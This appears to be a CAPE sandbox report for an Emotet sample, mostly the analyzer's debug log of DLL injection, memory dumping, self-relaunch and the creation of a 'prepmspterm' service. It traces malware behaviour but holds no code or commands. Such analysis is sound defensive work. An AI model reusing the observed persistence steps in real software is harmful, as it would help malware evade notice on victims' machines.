CAPE

Detections: Emotet


Analysis

Category Package Started Completed Duration Options Log
FILE exe 2019-10-10 00:57:00 2019-10-10 01:01:13 253 seconds Show Options Show Log
route = internet
procdump = 1
2019-10-10 01:57:01,000 [root] INFO: Date set to: 10-10-19, time set to: 00:57:01, timeout set to: 200
2019-10-10 01:57:01,030 [root] DEBUG: Starting analyzer from: C:\epyfuwi
2019-10-10 01:57:01,030 [root] DEBUG: Storing results at: C:\eFiNvgcB
2019-10-10 01:57:01,030 [root] DEBUG: Pipe server name: \\.\PIPE\rYYoJNHlMV
2019-10-10 01:57:01,030 [root] DEBUG: No analysis package specified, trying to detect it automagically.
2019-10-10 01:57:01,030 [root] INFO: Automatically selected analysis package "exe"
2019-10-10 01:57:01,546 [root] DEBUG: Started auxiliary module Browser
2019-10-10 01:57:01,546 [root] DEBUG: Started auxiliary module Curtain
2019-10-10 01:57:01,546 [modules.auxiliary.digisig] DEBUG: Checking for a digitial signature.
2019-10-10 01:57:01,967 [modules.auxiliary.digisig] DEBUG: File is not signed.
2019-10-10 01:57:01,967 [modules.auxiliary.digisig] INFO: Uploading signature results to aux/DigiSig.json
2019-10-10 01:57:01,967 [root] DEBUG: Started auxiliary module DigiSig
2019-10-10 01:57:01,967 [root] DEBUG: Started auxiliary module Disguise
2019-10-10 01:57:01,967 [root] DEBUG: Started auxiliary module Human
2019-10-10 01:57:01,967 [root] DEBUG: Started auxiliary module Screenshots
2019-10-10 01:57:01,967 [root] DEBUG: Started auxiliary module Sysmon
2019-10-10 01:57:01,982 [root] DEBUG: Started auxiliary module Usage
2019-10-10 01:57:01,982 [root] INFO: Analyzer: Package modules.packages.exe does not specify a DLL option
2019-10-10 01:57:01,982 [root] INFO: Analyzer: Package modules.packages.exe does not specify a DLL_64 option
2019-10-10 01:57:02,029 [lib.api.process] INFO: Successfully executed process from path "C:\Users\user\AppData\Local\Temp\ygg9ytft62s5ip.exe" with arguments "" with pid 1988
2019-10-10 01:57:02,029 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-10-10 01:57:02,029 [lib.api.process] INFO: 32-bit DLL to inject is C:\epyfuwi\dll\NPTizCi.dll, loader C:\epyfuwi\bin\duzqzcO.exe
2019-10-10 01:57:02,059 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\rYYoJNHlMV.
2019-10-10 01:57:02,059 [root] DEBUG: Loader: Injecting process 1988 (thread 1332) with C:\epyfuwi\dll\NPTizCi.dll.
2019-10-10 01:57:02,059 [root] DEBUG: Process image base: 0x00400000
2019-10-10 01:57:02,059 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\epyfuwi\dll\NPTizCi.dll.
2019-10-10 01:57:02,059 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x0049C000 - 0x77110000
2019-10-10 01:57:02,059 [root] DEBUG: InjectDllViaIAT: Allocated 0x200 bytes for new import table at 0x004A0000.
2019-10-10 01:57:02,059 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-10-10 01:57:02,059 [root] DEBUG: Successfully injected DLL C:\epyfuwi\dll\NPTizCi.dll.
2019-10-10 01:57:02,059 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 1988
2019-10-10 01:57:04,088 [lib.api.process] INFO: Successfully resumed process with pid 1988
2019-10-10 01:57:04,088 [root] INFO: Added new process to list with pid: 1988
2019-10-10 01:57:04,134 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-10-10 01:57:04,134 [root] DEBUG: Process dumps enabled.
2019-10-10 01:57:04,213 [root] DEBUG: RestoreHeaders: Restored original import table.
2019-10-10 01:57:04,213 [root] INFO: Disabling sleep skipping.
2019-10-10 01:57:04,213 [root] INFO: Disabling sleep skipping.
2019-10-10 01:57:04,213 [root] INFO: Disabling sleep skipping.
2019-10-10 01:57:04,213 [root] INFO: Disabling sleep skipping.
2019-10-10 01:57:04,213 [root] DEBUG: CAPE initialised: 32-bit base package loaded in process 1988 at 0x74880000, image base 0x400000, stack from 0x186000-0x190000
2019-10-10 01:57:04,213 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\"C:\Users\user\AppData\Local\Temp\ygg9ytft62s5ip.exe".
2019-10-10 01:57:04,213 [root] INFO: Monitor successfully loaded in process with pid 1988.
2019-10-10 01:57:04,259 [root] DEBUG: set_caller_info: Adding region at 0x003D0000 to caller regions list (ntdll::NtAllocateVirtualMemory).
2019-10-10 01:57:04,259 [root] DEBUG: set_caller_info: Adding region at 0x005B0000 to caller regions list (ntdll::memcpy).
2019-10-10 01:57:04,276 [root] INFO: Announced 32-bit process name: ygg9ytft62s5ip.exe pid: 1356
2019-10-10 01:57:04,276 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-10-10 01:57:04,276 [lib.api.process] INFO: 32-bit DLL to inject is C:\epyfuwi\dll\NPTizCi.dll, loader C:\epyfuwi\bin\duzqzcO.exe
2019-10-10 01:57:04,276 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\rYYoJNHlMV.
2019-10-10 01:57:04,276 [root] DEBUG: Loader: Injecting process 1356 (thread 812) with C:\epyfuwi\dll\NPTizCi.dll.
2019-10-10 01:57:04,276 [root] DEBUG: Process image base: 0x00400000
2019-10-10 01:57:04,276 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\epyfuwi\dll\NPTizCi.dll.
2019-10-10 01:57:04,276 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x0049C000 - 0x77110000
2019-10-10 01:57:04,276 [root] DEBUG: InjectDllViaIAT: Allocated 0x200 bytes for new import table at 0x004A0000.
2019-10-10 01:57:04,276 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-10-10 01:57:04,276 [root] DEBUG: Successfully injected DLL C:\epyfuwi\dll\NPTizCi.dll.
2019-10-10 01:57:04,276 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 1356
2019-10-10 01:57:04,290 [root] DEBUG: DLL loaded at 0x74AF0000: C:\Windows\system32\apphelp (0x4c000 bytes).
2019-10-10 01:57:04,290 [root] INFO: Announced 32-bit process name: ygg9ytft62s5ip.exe pid: 1356
2019-10-10 01:57:04,290 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-10-10 01:57:04,290 [lib.api.process] INFO: 32-bit DLL to inject is C:\epyfuwi\dll\NPTizCi.dll, loader C:\epyfuwi\bin\duzqzcO.exe
2019-10-10 01:57:04,290 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\rYYoJNHlMV.
2019-10-10 01:57:04,290 [root] DEBUG: Loader: Injecting process 1356 (thread 812) with C:\epyfuwi\dll\NPTizCi.dll.
2019-10-10 01:57:04,290 [root] DEBUG: Process image base: 0x00400000
2019-10-10 01:57:04,290 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\epyfuwi\dll\NPTizCi.dll.
2019-10-10 01:57:04,290 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2019-10-10 01:57:04,306 [root] DEBUG: Successfully injected DLL C:\epyfuwi\dll\NPTizCi.dll.
2019-10-10 01:57:04,306 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 1356
2019-10-10 01:57:04,306 [root] DEBUG: NtTerminateProcess hook: Attempting to dump process 1988
2019-10-10 01:57:04,306 [root] DEBUG: GetHookCallerBase: thread 1332 (handle 0x0), return address 0x005BD293, allocation base 0x005B0000.
2019-10-10 01:57:04,306 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x00400000.
2019-10-10 01:57:04,306 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-10-10 01:57:04,306 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-10-10 01:57:04,306 [root] DEBUG: Process dumps enabled.
2019-10-10 01:57:04,306 [root] INFO: Disabling sleep skipping.
2019-10-10 01:57:04,306 [root] DEBUG: RestoreHeaders: Restored original import table.
2019-10-10 01:57:04,306 [root] DEBUG: CAPE initialised: 32-bit base package loaded in process 1356 at 0x74880000, image base 0x400000, stack from 0x186000-0x190000
2019-10-10 01:57:04,306 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x00400000.
2019-10-10 01:57:04,306 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\--400e05c0.
2019-10-10 01:57:04,306 [root] DEBUG: DumpProcess: Module entry point VA is 0x00007DD3.
2019-10-10 01:57:04,306 [root] INFO: Added new process to list with pid: 1356
2019-10-10 01:57:04,306 [root] INFO: Monitor successfully loaded in process with pid 1356.
2019-10-10 01:57:04,338 [root] INFO: Added new CAPE file to list with path: C:\eFiNvgcB\CAPE\1988_16329093274577104102019
2019-10-10 01:57:04,354 [root] DEBUG: set_caller_info: Adding region at 0x00280000 to caller regions list (ntdll::NtAllocateVirtualMemory).
2019-10-10 01:57:04,354 [root] DEBUG: DumpProcess: Module image dump success - dump size 0xa600.
2019-10-10 01:57:04,354 [root] DEBUG: set_caller_info: Adding region at 0x004A0000 to caller regions list (ntdll::memcpy).
2019-10-10 01:57:04,354 [root] DEBUG: DumpInterestingRegions: Dumping calling region at 0x005B0000.
2019-10-10 01:57:04,354 [root] DEBUG: DumpImageInCurrentProcess: Disguised PE image (bad MZ and/or PE headers) at 0x005B0000
2019-10-10 01:57:04,354 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-10-10 01:57:04,354 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x005B0000.
2019-10-10 01:57:04,354 [root] DEBUG: DumpProcess: Module entry point VA is 0x0000D1C5.
2019-10-10 01:57:04,354 [root] INFO: Added new CAPE file to list with path: C:\eFiNvgcB\CAPE\1988_19509753564577104102019
2019-10-10 01:57:04,354 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x10800.
2019-10-10 01:57:04,354 [root] DEBUG: DLL unloaded from 0x75140000.
2019-10-10 01:57:04,368 [root] INFO: Notified of termination of process with pid 1988.
2019-10-10 01:57:05,101 [root] INFO: Process with pid 1988 has terminated
2019-10-10 01:57:09,859 [root] DEBUG: DLL loaded at 0x75980000: C:\Windows\syswow64\OLEAUT32 (0x8f000 bytes).
2019-10-10 01:57:09,859 [root] DEBUG: DLL loaded at 0x743A0000: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32 (0x19e000 bytes).
2019-10-10 01:57:09,923 [root] DEBUG: DLL loaded at 0x75A70000: C:\Windows\syswow64\SETUPAPI (0x19d000 bytes).
2019-10-10 01:57:09,937 [root] DEBUG: DLL loaded at 0x75A10000: C:\Windows\syswow64\CFGMGR32 (0x27000 bytes).
2019-10-10 01:57:09,953 [root] DEBUG: DLL loaded at 0x75D40000: C:\Windows\syswow64\DEVOBJ (0x12000 bytes).
2019-10-10 01:57:09,953 [root] DEBUG: DLL loaded at 0x74EB0000: C:\Windows\syswow64\CLBCatQ (0x83000 bytes).
2019-10-10 01:57:09,984 [root] DEBUG: DLL loaded at 0x742A0000: C:\Windows\system32\propsys (0xf5000 bytes).
2019-10-10 01:57:09,984 [root] DEBUG: DLL unloaded from 0x75E70000.
2019-10-10 01:57:10,016 [root] DEBUG: DLL loaded at 0x74940000: C:\Windows\system32\ntmarta (0x21000 bytes).
2019-10-10 01:57:10,016 [root] DEBUG: DLL loaded at 0x76EA0000: C:\Windows\syswow64\WLDAP32 (0x45000 bytes).
2019-10-10 01:57:10,157 [root] INFO: Announced 64-bit process name: explorer.exe pid: 1632
2019-10-10 01:57:10,157 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-10-10 01:57:10,157 [lib.api.process] INFO: 64-bit DLL to inject is C:\epyfuwi\dll\DQkWzH.dll, loader C:\epyfuwi\bin\nUWuvqFN.exe
2019-10-10 01:57:10,187 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\rYYoJNHlMV.
2019-10-10 01:57:10,187 [root] DEBUG: Loader: Injecting process 1632 (thread 0) with C:\epyfuwi\dll\DQkWzH.dll.
2019-10-10 01:57:10,203 [root] DEBUG: InjectDll: No thread ID supplied, GetProcessInitialThreadId failed.
2019-10-10 01:57:10,219 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-10-10 01:57:10,219 [root] DEBUG: Process dumps enabled.
2019-10-10 01:57:10,219 [root] INFO: Disabling sleep skipping.
2019-10-10 01:57:10,296 [root] WARNING: Unable to place hook on LockResource
2019-10-10 01:57:10,312 [root] WARNING: Unable to hook LockResource
2019-10-10 01:57:10,375 [root] DEBUG: CAPE initialised: 64-bit base package loaded in process 1632 at 0x00000000741C0000, image base 0x00000000FF900000, stack from 0x0000000006CD2000-0x0000000006CE0000
2019-10-10 01:57:10,375 [root] DEBUG: Commandline: C:\Windows\explorer.exe.
2019-10-10 01:57:10,375 [root] INFO: Added new process to list with pid: 1632
2019-10-10 01:57:10,375 [root] INFO: Monitor successfully loaded in process with pid 1632.
2019-10-10 01:57:10,405 [root] DEBUG: InjectDllViaThread: Successfully injected Dll into process via RtlCreateUserThread.
2019-10-10 01:57:10,405 [root] DEBUG: InjectDll: Successfully injected DLL via thread.
2019-10-10 01:57:10,405 [root] DEBUG: Successfully injected DLL C:\epyfuwi\dll\DQkWzH.dll.
2019-10-10 01:57:10,469 [root] DEBUG: DLL unloaded from 0x742A0000.
2019-10-10 01:57:10,469 [root] DEBUG: DLL loaded at 0x74C70000: C:\Windows\system32\CRYPTSP (0x16000 bytes).
2019-10-10 01:57:10,469 [root] DEBUG: DLL loaded at 0x74C30000: C:\Windows\system32\rsaenh (0x3b000 bytes).
2019-10-10 01:57:10,483 [root] DEBUG: DLL loaded at 0x747E0000: C:\Windows\system32\RpcRtRemote (0xe000 bytes).
2019-10-10 01:57:10,516 [root] DEBUG: DLL loaded at 0x747D0000: C:\Windows\system32\mssprxy (0xc000 bytes).
2019-10-10 01:57:10,546 [root] DEBUG: DLL unloaded from 0x747D0000.
2019-10-10 01:57:10,546 [root] DEBUG: DLL unloaded from 0x75C10000.
2019-10-10 01:57:10,546 [root] DEBUG: DLL unloaded from 0x75E70000.
2019-10-10 01:57:10,671 [root] INFO: Announced starting service "prepmspterm"
2019-10-10 01:57:10,671 [root] INFO: Attaching to Service Control Manager (services.exe - pid 460)
2019-10-10 01:57:10,687 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-10-10 01:57:10,687 [lib.api.process] INFO: 64-bit DLL to inject is C:\epyfuwi\dll\DQkWzH.dll, loader C:\epyfuwi\bin\nUWuvqFN.exe
2019-10-10 01:57:10,687 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\rYYoJNHlMV.
2019-10-10 01:57:10,687 [root] DEBUG: Loader: Injecting process 460 (thread 0) with C:\epyfuwi\dll\DQkWzH.dll.
2019-10-10 01:57:10,687 [root] DEBUG: InjectDll: No thread ID supplied, GetProcessInitialThreadId failed.
2019-10-10 01:57:10,717 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-10-10 01:57:10,733 [root] DEBUG: Process dumps enabled.
2019-10-10 01:57:10,733 [root] INFO: Disabling sleep skipping.
2019-10-10 01:57:10,733 [root] WARNING: Unable to place hook on LockResource
2019-10-10 01:57:10,750 [root] WARNING: Unable to hook LockResource
2019-10-10 01:57:10,750 [root] DEBUG: CAPE initialised: 64-bit base package loaded in process 460 at 0x00000000741C0000, image base 0x00000000FFA10000, stack from 0x0000000002FB6000-0x0000000002FC0000
2019-10-10 01:57:10,750 [root] DEBUG: Commandline: C:\Windows\sysnative\services.exe.
2019-10-10 01:57:10,750 [root] INFO: Added new process to list with pid: 460
2019-10-10 01:57:10,750 [root] INFO: Monitor successfully loaded in process with pid 460.
2019-10-10 01:57:10,750 [root] DEBUG: InjectDllViaThread: Successfully injected Dll into process via RtlCreateUserThread.
2019-10-10 01:57:10,750 [root] DEBUG: InjectDll: Successfully injected DLL via thread.
2019-10-10 01:57:10,750 [root] DEBUG: Successfully injected DLL C:\epyfuwi\dll\DQkWzH.dll.
2019-10-10 01:57:11,779 [root] INFO: Announced 32-bit process name: prepmspterm.exe pid: 2344
2019-10-10 01:57:11,795 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-10-10 01:57:11,795 [lib.api.process] INFO: 32-bit DLL to inject is C:\epyfuwi\dll\NPTizCi.dll, loader C:\epyfuwi\bin\duzqzcO.exe
2019-10-10 01:57:11,809 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\rYYoJNHlMV.
2019-10-10 01:57:11,809 [root] DEBUG: Loader: Injecting process 2344 (thread 2032) with C:\epyfuwi\dll\NPTizCi.dll.
2019-10-10 01:57:11,825 [root] DEBUG: Process image base: 0x00400000
2019-10-10 01:57:11,825 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\epyfuwi\dll\NPTizCi.dll.
2019-10-10 01:57:11,825 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x0049C000 - 0x77110000
2019-10-10 01:57:11,842 [root] DEBUG: InjectDllViaIAT: Allocated 0x200 bytes for new import table at 0x004A0000.
2019-10-10 01:57:11,857 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-10-10 01:57:11,857 [root] DEBUG: Successfully injected DLL C:\epyfuwi\dll\NPTizCi.dll.
2019-10-10 01:57:11,857 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2344
2019-10-10 01:57:11,888 [root] INFO: Announced 32-bit process name: prepmspterm.exe pid: 2344
2019-10-10 01:57:11,888 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-10-10 01:57:11,888 [lib.api.process] INFO: 32-bit DLL to inject is C:\epyfuwi\dll\NPTizCi.dll, loader C:\epyfuwi\bin\duzqzcO.exe
2019-10-10 01:57:11,904 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\rYYoJNHlMV.
2019-10-10 01:57:11,904 [root] DEBUG: Loader: Injecting process 2344 (thread 2032) with C:\epyfuwi\dll\NPTizCi.dll.
2019-10-10 01:57:11,904 [root] DEBUG: Process image base: 0x00400000
2019-10-10 01:57:11,904 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\epyfuwi\dll\NPTizCi.dll.
2019-10-10 01:57:11,904 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2019-10-10 01:57:11,920 [root] DEBUG: Successfully injected DLL C:\epyfuwi\dll\NPTizCi.dll.
2019-10-10 01:57:11,920 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2344
2019-10-10 01:57:11,950 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-10-10 01:57:11,950 [root] DEBUG: Process dumps enabled.
2019-10-10 01:57:11,966 [root] INFO: Disabling sleep skipping.
2019-10-10 01:57:11,966 [root] DEBUG: RestoreHeaders: Restored original import table.
2019-10-10 01:57:11,966 [root] DEBUG: CAPE initialised: 32-bit base package loaded in process 2344 at 0x74880000, image base 0x400000, stack from 0x186000-0x190000
2019-10-10 01:57:11,997 [root] DEBUG: Commandline: C:\Windows\System32\"C:\Windows\SysWOW64\prepmspterm.exe".
2019-10-10 01:57:11,997 [root] INFO: Added new process to list with pid: 2344
2019-10-10 01:57:11,997 [root] INFO: Monitor successfully loaded in process with pid 2344.
2019-10-10 01:57:12,029 [root] DEBUG: set_caller_info: Adding region at 0x00280000 to caller regions list (ntdll::NtAllocateVirtualMemory).
2019-10-10 01:57:12,029 [root] DEBUG: set_caller_info: Adding region at 0x003E0000 to caller regions list (ntdll::memcpy).
2019-10-10 01:57:12,029 [root] INFO: Announced 32-bit process name: prepmspterm.exe pid: 2732
2019-10-10 01:57:12,043 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-10-10 01:57:12,043 [lib.api.process] INFO: 32-bit DLL to inject is C:\epyfuwi\dll\NPTizCi.dll, loader C:\epyfuwi\bin\duzqzcO.exe
2019-10-10 01:57:12,043 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\rYYoJNHlMV.
2019-10-10 01:57:12,043 [root] DEBUG: Loader: Injecting process 2732 (thread 2624) with C:\epyfuwi\dll\NPTizCi.dll.
2019-10-10 01:57:12,043 [root] DEBUG: Process image base: 0x00400000
2019-10-10 01:57:12,059 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\epyfuwi\dll\NPTizCi.dll.
2019-10-10 01:57:12,059 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x0049C000 - 0x77110000
2019-10-10 01:57:12,059 [root] DEBUG: InjectDllViaIAT: Allocated 0x200 bytes for new import table at 0x004A0000.
2019-10-10 01:57:12,059 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-10-10 01:57:12,059 [root] DEBUG: Successfully injected DLL C:\epyfuwi\dll\NPTizCi.dll.
2019-10-10 01:57:12,059 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2732
2019-10-10 01:57:12,059 [root] DEBUG: DLL loaded at 0x74AF0000: C:\Windows\system32\apphelp (0x4c000 bytes).
2019-10-10 01:57:12,059 [root] INFO: Announced 32-bit process name: prepmspterm.exe pid: 2732
2019-10-10 01:57:12,059 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-10-10 01:57:12,059 [lib.api.process] INFO: 32-bit DLL to inject is C:\epyfuwi\dll\NPTizCi.dll, loader C:\epyfuwi\bin\duzqzcO.exe
2019-10-10 01:57:12,075 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\rYYoJNHlMV.
2019-10-10 01:57:12,075 [root] DEBUG: Loader: Injecting process 2732 (thread 2624) with C:\epyfuwi\dll\NPTizCi.dll.
2019-10-10 01:57:12,075 [root] DEBUG: Process image base: 0x00400000
2019-10-10 01:57:12,075 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\epyfuwi\dll\NPTizCi.dll.
2019-10-10 01:57:12,075 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2019-10-10 01:57:12,075 [root] DEBUG: Successfully injected DLL C:\epyfuwi\dll\NPTizCi.dll.
2019-10-10 01:57:12,091 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2732
2019-10-10 01:57:12,091 [root] DEBUG: NtTerminateProcess hook: Attempting to dump process 2344
2019-10-10 01:57:12,091 [root] DEBUG: GetHookCallerBase: thread 2032 (handle 0x0), return address 0x003ED293, allocation base 0x003E0000.
2019-10-10 01:57:12,091 [root] DEBUG: DumpInterestingRegions: Dumping calling region at 0x003E0000.
2019-10-10 01:57:12,091 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-10-10 01:57:12,091 [root] DEBUG: DumpImageInCurrentProcess: Disguised PE image (bad MZ and/or PE headers) at 0x003E0000
2019-10-10 01:57:12,091 [root] DEBUG: Process dumps enabled.
2019-10-10 01:57:12,091 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-10-10 01:57:12,091 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x003E0000.
2019-10-10 01:57:12,091 [root] INFO: Disabling sleep skipping.
2019-10-10 01:57:12,091 [root] DEBUG: DumpProcess: Module entry point VA is 0x0000D1C5.
2019-10-10 01:57:12,107 [root] DEBUG: RestoreHeaders: Restored original import table.
2019-10-10 01:57:12,107 [root] DEBUG: CAPE initialised: 32-bit base package loaded in process 2732 at 0x74880000, image base 0x400000, stack from 0x186000-0x190000
2019-10-10 01:57:12,107 [root] DEBUG: Commandline: C:\Windows\System32\--525413bf.
2019-10-10 01:57:12,107 [root] INFO: Added new process to list with pid: 2732
2019-10-10 01:57:12,107 [root] INFO: Monitor successfully loaded in process with pid 2732.
2019-10-10 01:57:12,107 [root] INFO: Added new CAPE file to list with path: C:\eFiNvgcB\CAPE\2344_60279556117577104102019
2019-10-10 01:57:12,138 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x10800.
2019-10-10 01:57:12,138 [root] DEBUG: set_caller_info: Adding region at 0x00250000 to caller regions list (ntdll::NtAllocateVirtualMemory).
2019-10-10 01:57:12,138 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x00400000.
2019-10-10 01:57:12,138 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-10-10 01:57:12,138 [root] DEBUG: set_caller_info: Adding region at 0x003D0000 to caller regions list (ntdll::memcpy).
2019-10-10 01:57:12,138 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x00400000.
2019-10-10 01:57:12,138 [root] DEBUG: DumpProcess: Module entry point VA is 0x00007DD3.
2019-10-10 01:57:12,154 [root] INFO: Added new CAPE file to list with path: C:\eFiNvgcB\CAPE\2344_32823336017577104102019
2019-10-10 01:57:12,154 [root] DEBUG: DumpProcess: Module image dump success - dump size 0xa600.
2019-10-10 01:57:12,154 [root] DEBUG: DLL unloaded from 0x75140000.
2019-10-10 01:57:12,154 [root] INFO: Notified of termination of process with pid 2344.
2019-10-10 01:57:12,168 [root] WARNING: Unable to open termination event for pid 2344.
2019-10-10 01:57:12,168 [root] DEBUG: NtTerminateProcess hook: Attempting to dump process 1356
2019-10-10 01:57:12,168 [root] DEBUG: GetHookCallerBase: thread 812 (handle 0x0), return address 0x004AD26C, allocation base 0x004A0000.
2019-10-10 01:57:12,168 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x00400000.
2019-10-10 01:57:12,168 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-10-10 01:57:12,168 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x00400000.
2019-10-10 01:57:12,168 [root] DEBUG: DumpProcess: Module entry point VA is 0x00007DD3.
2019-10-10 01:57:12,184 [root] INFO: Added new CAPE file to list with path: C:\eFiNvgcB\CAPE\1356_45441180922587104102019
2019-10-10 01:57:12,184 [root] DEBUG: DumpProcess: Module image dump success - dump size 0xa600.
2019-10-10 01:57:12,184 [root] DEBUG: DumpInterestingRegions: Dumping calling region at 0x004A0000.
2019-10-10 01:57:12,184 [root] DEBUG: DumpImageInCurrentProcess: Disguised PE image (bad MZ and/or PE headers) at 0x004A0000
2019-10-10 01:57:12,184 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-10-10 01:57:12,184 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x004A0000.
2019-10-10 01:57:12,200 [root] DEBUG: DumpProcess: Module entry point VA is 0x0000D1C5.
2019-10-10 01:57:12,200 [root] INFO: Added new CAPE file to list with path: C:\eFiNvgcB\CAPE\1356_35468613622587104102019
2019-10-10 01:57:12,200 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x12600.
2019-10-10 01:57:12,200 [root] DEBUG: DLL unloaded from 0x742A0000.
2019-10-10 01:57:12,200 [root] DEBUG: DLL unloaded from 0x75140000.
2019-10-10 01:57:12,200 [root] DEBUG: DLL unloaded from 0x74940000.
2019-10-10 01:57:12,216 [root] INFO: Notified of termination of process with pid 1356.
2019-10-10 01:57:12,232 [root] INFO: Process with pid 1356 has terminated
2019-10-10 01:57:12,232 [root] INFO: Process with pid 2344 has terminated
2019-10-10 01:57:23,977 [root] DEBUG: DLL loaded at 0x75790000: C:\Windows\syswow64\crypt32 (0x11d000 bytes).
2019-10-10 01:57:23,977 [root] DEBUG: DLL loaded at 0x755F0000: C:\Windows\syswow64\MSASN1 (0xc000 bytes).
2019-10-10 01:57:23,993 [root] DEBUG: DLL loaded at 0x74F40000: C:\Windows\syswow64\urlmon (0x136000 bytes).
2019-10-10 01:57:24,025 [root] DEBUG: DLL loaded at 0x75600000: C:\Windows\syswow64\WININET (0xf5000 bytes).
2019-10-10 01:57:24,025 [root] DEBUG: DLL loaded at 0x76CA0000: C:\Windows\syswow64\iertutil (0x1fb000 bytes).
2019-10-10 01:57:24,040 [root] DEBUG: DLL loaded at 0x75980000: C:\Windows\syswow64\OLEAUT32 (0x8f000 bytes).
2019-10-10 01:57:24,040 [root] DEBUG: DLL loaded at 0x747D0000: C:\Windows\SysWOW64\userenv (0x17000 bytes).
2019-10-10 01:57:24,040 [root] DEBUG: DLL loaded at 0x74530000: C:\Windows\SysWOW64\profapi (0xb000 bytes).
2019-10-10 01:57:24,040 [root] DEBUG: DLL loaded at 0x74520000: C:\Windows\SysWOW64\wtsapi32 (0xd000 bytes).
2019-10-10 01:57:24,055 [root] DEBUG: DLL loaded at 0x74C70000: C:\Windows\SysWOW64\CRYPTSP (0x16000 bytes).
2019-10-10 01:57:24,055 [root] DEBUG: DLL loaded at 0x74C30000: C:\Windows\system32\rsaenh (0x3b000 bytes).
2019-10-10 01:57:29,282 [root] DEBUG: DLL loaded at 0x74380000: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32 (0x19e000 bytes).
2019-10-10 01:57:29,359 [root] DEBUG: DLL loaded at 0x74940000: C:\Windows\SysWOW64\ntmarta (0x21000 bytes).
2019-10-10 01:57:29,359 [root] DEBUG: DLL loaded at 0x76EA0000: C:\Windows\syswow64\WLDAP32 (0x45000 bytes).
2019-10-10 01:57:29,391 [root] DEBUG: DLL loaded at 0x74B50000: C:\Windows\SysWOW64\dnsapi (0x44000 bytes).
2019-10-10 01:57:29,391 [root] DEBUG: DLL loaded at 0x74360000: C:\Windows\SysWOW64\iphlpapi (0x1c000 bytes).
2019-10-10 01:57:29,391 [root] DEBUG: DLL loaded at 0x74350000: C:\Windows\SysWOW64\WINNSI (0x7000 bytes).
2019-10-10 01:57:29,407 [root] DEBUG: DLL unloaded from 0x75D60000.
2019-10-10 01:57:29,407 [root] DEBUG: DLL loaded at 0x751A0000: C:\Windows\syswow64\Normaliz (0x3000 bytes).
